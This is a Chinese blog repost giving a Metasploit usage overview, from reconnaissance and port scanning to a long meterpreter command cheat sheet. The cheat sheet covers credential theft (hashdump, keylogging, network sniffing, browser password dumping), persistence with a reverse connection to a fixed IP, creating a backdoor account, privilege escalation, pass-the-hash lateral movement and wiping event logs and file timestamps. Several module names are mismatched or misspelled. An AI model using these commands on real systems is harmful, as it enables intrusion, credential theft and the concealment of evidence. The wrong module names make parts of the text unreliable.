Metaspolit使用简介

信息收集阶段


Whois信息收集

msf auxiliary > whois baidu.com

1070321-20180614151147110-115785854.png

域名信息查询阶段

msf auxiliary > nslookup www.baidu.com
msf auxiliary > dig @114.114.114.114 www.baidu.com 

1070321-20180614151725180-11853868.png
1070321-20180614151742821-285104075.png

主机端口探测阶段

直接使用PING命令探测连通性
ping 1.2.3.4

msf > use auxiliary/scanner/discovery/arp_sweep
msf > set RHOSTS 1.1.1.0/24
msf > set THREADS 50
msf > run

使用NMAP探测
msf > nmap command

服务扫描打点

telnet服务:use auxiliary/scanner/telnet/telnet_version
ssh服务:use auxiliary/scanner/ssh/telnet_version
Oracle服务:use auxiliary/scanner/oracle/tnslsnr_version
http服务:use auxiliary/scanner/http/open_proxy

口令探测

ssh服务:use auxiliary/scanner/ssh/telnet_login
ftp服务:use auxiliary/sniffer/psnuffle

漏洞扫描阶段


那是nessus openVAS等的天下,可以利用PostgreSQL数据库进行联动

MSF框架下的WEB渗透


为什么不用burpsuite呢,用burpsuite更好
还有SQLMAP啊,还有好多其他的啊,啦啦啦

漏洞利用阶段


选择合适的漏洞利用payload和攻击脚本即可

use xxx
set payload xxx

强大的meterpreter


meterpreter > background 后台运行meterpreter
meterpreter > sessions 列出session,选择交互session的话 使用session -i  x
msterpreter > shell 
msterpreter > cat xxxxx 查看文件
msterpreter > getwd/getlwd  获取当下路径
msterpreter > upload xxx.exe c:\  上传文件或文件夹
msterpreter > download c:\\"Program Files"\\xxx\\xxx\\xxx  ./  下载文件
msterpreter > edit 使用vi编辑器编辑目标机上的文件
msterpreter > search 搜索目标上的文件
msterpreter > ipconfig 查看网络信息
msterpreter > portfwd add -l 1234 -p 3389 -r 1.2.3.4 将目标机的3389 转发到本地1234端口
msterpreter > route 查看目标机的路由信息
msterpreter > ps  查看进程表
msterpreter > migrate 转移shell到进程
msterpreter > execute -H -f cmd.exe 隐藏执行cmd
msterpreter > execute -H -i -f cmd.exe 可以与cmd交互了 -m 参数直接在内存执行供给端的可执行文件 execute -H -m -d xxx.exe -f xxx.exe -a "-o xxxx.txt" 
msterpreter > getpid 获取当前会话所在进程的pid
msterpreter > getuid /whoami 获取自己是谁
msterpreter > sysinfo  查看系统信息
msterpreter > kill 杀掉进程
msterpreter > shutdown关机
msterpreter > hashdump 获取windows 的hash口令
msterpreter > run persistence -X -i 5 -p 443 -r 192.168.10.141
msterpreter > run metsvc #吧31337端口打开监听meterpreter
msterpreter > run getgui -u metaspolit -p meterpreter 添加账户metaspolit 密码meterpreter
msterpreter > run multi_console_command -rc /root/.msf3/logs/scripts/getgui/clean_up_xxxxxxxx.xxxx.rc
msterpreter > getsystem 提权
msterpreter > run post/windows/gather/dumplinks 获取最近处理的文档
msterpreter > run post/windows/gather/enum_applications 获取安装的程序
msterpreter > keyscan_start 键盘记录
msterpreter > keyscan_dump 
msterpreter > keyscan_stop 关闭
msterpreter > use sniffer #网络监听获取密码
msterpreter > sniffer_interface
msterpreter > sniffer_start 1
msterpreter > sniffer_dump 1 /tmp/xxx.pcap 
msterpreter > sniffer_stop 1
msterpreter > run post/windows/gather/enum_ie 浏览器获取密码
msterpreter > run windows/gather/smart_hashdump 获取系统口令
msterpreter > run get_local_subnets 添加路由 
msterpreter > background 后 route add a.b.c.d x.x.x.x 1 然后查看route print 
msf > use exploit/windows/smb/psexec
msf > set RHOST RPORT LHOST ...
msf > set SMBPass hash值
msf > exploit
msterpreter > clearev 删除日志
msterpreter >timestomp 停止修改文件属性的时间记录

转载于:https://www.cnblogs.com/KevinGeorge/p/9183122.html

  • 0
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值